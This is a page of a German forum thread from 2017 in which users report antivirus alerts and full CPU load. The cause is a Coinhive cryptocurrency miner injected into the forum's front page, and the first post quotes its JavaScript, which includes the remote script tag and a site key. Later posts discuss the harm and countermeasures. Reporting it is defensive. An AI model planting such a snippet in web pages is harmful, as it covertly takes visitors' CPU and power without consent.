Seite 1 von 7 123456 ... LetzteLetzte
Ergebnis 1 bis 15 von 94

Thema: Coinhive Crypto-Miner

  1. #1
    marcusysk
    Gast

    Standard Coinhive Crypto-Miner

    Hallo liebe Forums-Admins,

    mein Virenscanner ist gerade beim Aufrufen der Titelseite angeschlagen. Offensichtlich ist JS-Code in den Quelltext eingefügt worden, der über die Website "Coinhive" versucht Bitcoins zu minen ohne die Nutzer zu fragen:

    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>
    var miner = new CoinHive.Anonymous('D1t6CmXN8rXhZOQFKY6D97xUsSJ1ag FD');
    miner.start();
    </script>


    Ich finde das ehrlich gesagt nicht lustig und vielleicht könnte mal jemand dazu Stellung beziehen? Allen anderen bis dahin erstmal zur Info.

    https://www.golem.de/news/kryptowaeh...10-130403.html

    Marcus
    Geändert von marcusysk (05.10.2017 um 17:12 Uhr)

  2. #2
    Power User
    Registriert seit
    28.06.2010
    Beiträge
    437
    Renommee-Modifikator
    32857

    Standard

    Das kann ich ebenfalls bestätigen, auch ich bekomme eine Warnung. Es ist kein üblicher Trojaner oder Virus, aber es nutzt Javascript, damit dann der eigene Rechner eine Kryptowährung bzw. die Blockchain rechnet. So wird der PC bzw. die CPU stark belastet und man gewährt unfreiwillig die Rechenkapazität des eigenen Rechners zum Zwecke anderer, die daran verdienen.

    Die Admins sollten hier eine Stellung dazu geben!
    Geändert von pizzabote (05.10.2017 um 22:47 Uhr)

  3. #3
    Power+ User
    Registriert seit
    08.04.2011
    Beiträge
    1.301
    Renommee-Modifikator
    6799012

    Standard

    Hab dasselbe Problem gehabt.

  4. #4
    Samenspender
    Registriert seit
    06.05.2010
    Beiträge
    585
    Renommee-Modifikator
    1920146

    Standard

    Mein G DATA Total Security meldet sich auch.Klicke auf die Grafik für eine größere Ansicht 

Name:	Unbenannt.jpg 
Hits:	111 
Größe:	362,8 KB 
ID:	53119


    Junkware (PUP): Application.BitCoinMiner.SX (Engine A)
    Datei: CE94BF5164C04AE312403C4CA6A85F4F3B1133A2
    Verzeichnis: C:\Users\Harichter_2\AppData\Local\Mozilla\Firefox \Profiles\8qy6ymxb.default\cache2\entries
    Prozess: firefox.exe
    Geändert von Hades (05.10.2017 um 23:43 Uhr)

  5. #5
    Mod Nord/Ost&Berlin Avatar von Heineken77
    Registriert seit
    29.12.2009
    Ort
    zwischen Hannover und Braunschweig
    Alter
    46
    Beiträge
    6.284
    Renommee-Modifikator
    334465

    Standard

    Ihr meint soetwas hier?

    Klicke auf die Grafik für eine größere Ansicht 

Name:	cpu.jpg 
Hits:	124 
Größe:	165,2 KB 
ID:	53121

    Ich weiß aber auch nicht woher das kommt. Ich versuche mich mal schlau zu machen.

    Update: Hmm, jetzt ist es weg
    Geändert von Heineken77 (06.10.2017 um 00:07 Uhr)
    Mod, nicht Admin!

  6. #6
    Power User
    Registriert seit
    24.08.2009
    Beiträge
    135
    Renommee-Modifikator
    8932

    Standard

    Mein Rechner lief auf Volllast. Safari steigt dann mit Fehlermeldung aus. Runtergefahren, hochgefahren, Javascript deaktiviert. Alles gut jetzt. Trotzdem bin ich etwas irritiert. Komisches Gefühl, wenn der eigene Rechner Dinge für Fremde tut, die man nicht in Auftrag gegeben hat.
    Geändert von tee100 (06.10.2017 um 00:24 Uhr)

  7. #7
    Fiststueck
    Gast

    Standard

    Zitat Zitat von tee100 Beitrag anzeigen
    Mein Rechner lief auf Volllast. Safari steigt dann mit Fehlermeldung aus. Runtergefahren, hochgefahren, Javascript deaktiviert. Alles gut jetzt. Trotzdem bin ich etwas irritiert. Komisches Gefühl, wenn der eigene Rechner Dinge für Fremde tut, die man nicht in Auftrag gegeben hat.

    Dein Rechner braucht wohl noch etwas Führung und Erziehung. Vielleicht solltest Du Dir einen belasbareren suchen?
    Meiner hat's erkannt und eliminiert. Manchmal geht eben doch nicht alles ohne guten Schutz. Gutes Gefühl, wenn der eigene Rechner und Fremde Dinge für mich tun, von denen ich gar nicht weiss, dass ich sie in Auftrag gegeben habe.

  8. #8
    Mod Nord/Ost&Berlin Avatar von Heineken77
    Registriert seit
    29.12.2009
    Ort
    zwischen Hannover und Braunschweig
    Alter
    46
    Beiträge
    6.284
    Renommee-Modifikator
    334465

    Standard

    Wie auf dem Bild zu sehen lief meiner auch auf Anschlag. Ich hatte allerdings keinerlei Fehlermeldungen. Der Rechner hat so agiert als ob er einfach das macht was er soll. Wie der nötige Code jetzt auf die Seite hier kam weiß ich allerdings im Moment nicht. Und ja, das ist ein komisches Gefühl und ich will mir gar nicht vorstellen, wie das auf schwächeren Rechnern, oder auf welchen mit einem schlechtem CPU-Management aussieht. Ich denke mein Notebook hätte einfach krampfhaft versucht die Anforderung abzuarbeiten und damit jegliche Eingabe unmöglich gemacht. Ich war auch gerade sehr erstaunt als ich die Auslastung gesehen habe. Volle Auslastung habe ich eigentlich nur beim Video rendern, selbst bei den meißten Benchmarks schlagen nicht alle voll aus.
    Mod, nicht Admin!

  9. #9
    Power User
    Registriert seit
    28.06.2010
    Beiträge
    437
    Renommee-Modifikator
    32857

    Standard

    Ich empfehle AddOns für den Browser wie z.B. NoScript, da werden generell die Skripe blockiert und wenn benötigt dann eingeschaltet.

  10. #10
    Fiststueck
    Gast

    Standard

    Zitat Zitat von Heineken77 Beitrag anzeigen
    (...( und ich will mir gar nicht vorstellen, wie das auf schwächeren Rechnern, oder auf welchen mit einem schlechtem CPU-Management aussieht. Ich denke mein Notebook hätte einfach krampfhaft versucht die Anforderung abzuarbeiten und damit jegliche Eingabe unmöglich gemacht. (...)
    Also mein Notebook läuft auf dem letzten Ast - da ist nix mehr zu holen (und da hat es dieser Wirrus aufgegeben).

    Zitat Zitat von pizzabote Beitrag anzeigen
    Das kann ich ebenfalls bestätigen, auch ich bekomme eine Warnung. Es ist kein üblicher Trojaner oder Virus, aber es nutzt Javascript, damit dann der eigene Rechner eine Kryptowährung bzw. die Blockchain rechnet. So wird der PC bzw. die CPU stark belastet und man gewährt unfreiwillig die Rechenkapazität des eigenen Rechners zum Zwecke anderer, die daran verdienen.

    Die Admins sollten hier eine Stellung dazu geben!
    Na klar: Kryptowährung! Wieder so'n Fake-Krams.
    Das kommt davon, wenn Mann die CPU wählt! Stark belastet und gewährt die Kapazitität eigener Unfreiwilliger zum Zwecke Anderer!

    Genau, Ihr Admins! Raus mit der Sprache: Was habt Ihr mit der Mergel zu tun? In welcher Stellung?

  11. #11
    Power User
    Registriert seit
    28.06.2010
    Beiträge
    437
    Renommee-Modifikator
    32857

    Standard

    Die Verlinkung ist gleich im Body vom HTML Code zu finden...

    Klicke auf die Grafik für eine größere Ansicht 

Name:	Unbenannt.JPG 
Hits:	116 
Größe:	45,1 KB 
ID:	53122

  12. #12
    Mod Nord/Ost&Berlin Avatar von Heineken77
    Registriert seit
    29.12.2009
    Ort
    zwischen Hannover und Braunschweig
    Alter
    46
    Beiträge
    6.284
    Renommee-Modifikator
    334465

    Standard

    Zitat Zitat von Fiststueck Beitrag anzeigen
    Na klar: Kryptowährung! Wieder so'n Fake-Krams.
    Von Kryptowährung mag man halten was man will, Fake ist es allerdings nicht, ebensowenig wie ein Virus.

    Zitat Zitat von pizzabote Beitrag anzeigen
    Die Verlinkung ist gleich im Body vom HTML Code zu finden...

    Klicke auf die Grafik für eine größere Ansicht 

Name:	Unbenannt.JPG 
Hits:	116 
Größe:	45,1 KB 
ID:	53122
    Ja, das ist offensichtlich gezielt eingebettet wurden.

    Ich weiß davon nichts, finde es allerdings nicht schlimm. Ich finde das ist eine nette Idee der Querfinanzierung eines Forums. Allerdings sollte man bei sowas die CPU-Last stark begrenzen, dann entsteht auch niemanden ein Schaden. Wenn man, als Beispiel, das Ganze auf 10% der CPU-Last begrenzt steigt auch der Energieverbrauch der CPU nur minimal an, das ist selbst bei mobilen Geräten kaum spürbar. So wie das jetzt eingestellt war war es allerdings Mist. <---- Das ist nur meine persönliche Meinung. Ich habe keine Ahnung wer das warum eingebettet hat!
    Mod, nicht Admin!

  13. #13
    Power User
    Registriert seit
    14.01.2011
    Beiträge
    428
    Renommee-Modifikator
    1891

    Standard

    Hallo
    bekomme auch den Fehler,

  14. #14
    Fiststueck
    Gast

    Standard

    Zitat Zitat von Fiststueck Beitrag anzeigen
    Na klar: Kryptowährung! Wieder so'n Fake-Krams.
    Zitat Zitat von Heineken77 Beitrag anzeigen
    Von Kryptowährung mag man halten was man will, Fake ist es allerdings nicht, ebensowenig wie ein Virus.
    Hehe! Mit Kryptowährung kenne ich mich aber aus!
    Mancher FK wird das bestätigen: Fisti ist wieder aus ihrer Gruft erwacht...


    Zitat Zitat von Heineken77 Beitrag anzeigen
    Von Kryptowährung mag man halten was man will, Fake ist es allerdings nicht, ebensowenig wie ein Virus.



    Ja, das ist offensichtlich gezielt eingebettet wurden.

    Ich weiß davon nichts, finde es allerdings nicht schlimm. Ich finde das ist eine nette Idee der Querfinanzierung eines Forums. Allerdings sollte man bei sowas die CPU-Last stark begrenzen, dann entsteht auch niemanden ein Schaden. Wenn man, als Beispiel, das Ganze auf 10% der CPU-Last begrenzt steigt auch der Energieverbrauch der CPU nur minimal an, das ist selbst bei mobilen Geräten kaum spürbar. So wie das jetzt eingestellt war war es allerdings Mist. <---- Das ist nur meine persönliche Meinung. Ich habe keine Ahnung wer das warum eingebettet hat!
    Oha!
    Heftig... Doch nicht alles so ohne...

  15. #15
    Samenspender
    Registriert seit
    06.05.2010
    Beiträge
    585
    Renommee-Modifikator
    1920146

    Standard Coinhive Crypto-Miner

    Ich habe vollkommenes Verständnis dafür, dass ein Forum finanziert sein will. Ob Bannerwerbung, Mitgliedsbeiträge oder was weiß ich. Dass man den Usern allerdings etwas heimlich unterjubelt, was ihre Maschinenlast deutlich erhöht, das finde ich schon ein ziemlich starkes Stück. Und unprofessionell. Ich meine Akkulaufzeiten und auch Lebensdauern von CPUs. Mit einer rechtzeitigen Kommunikation hätte man sich die jetzige Aufregung erspart und bestimmt auch Verständnis von den Usern erhalten.

    Da Verantwortliche immer noch schweigen sieht es für mich nach dem Bubenstück aus, das ich wie oben erwähnt kritisiere.
    Geändert von Hades (06.10.2017 um 12:54 Uhr)

Seite 1 von 7 123456 ... LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •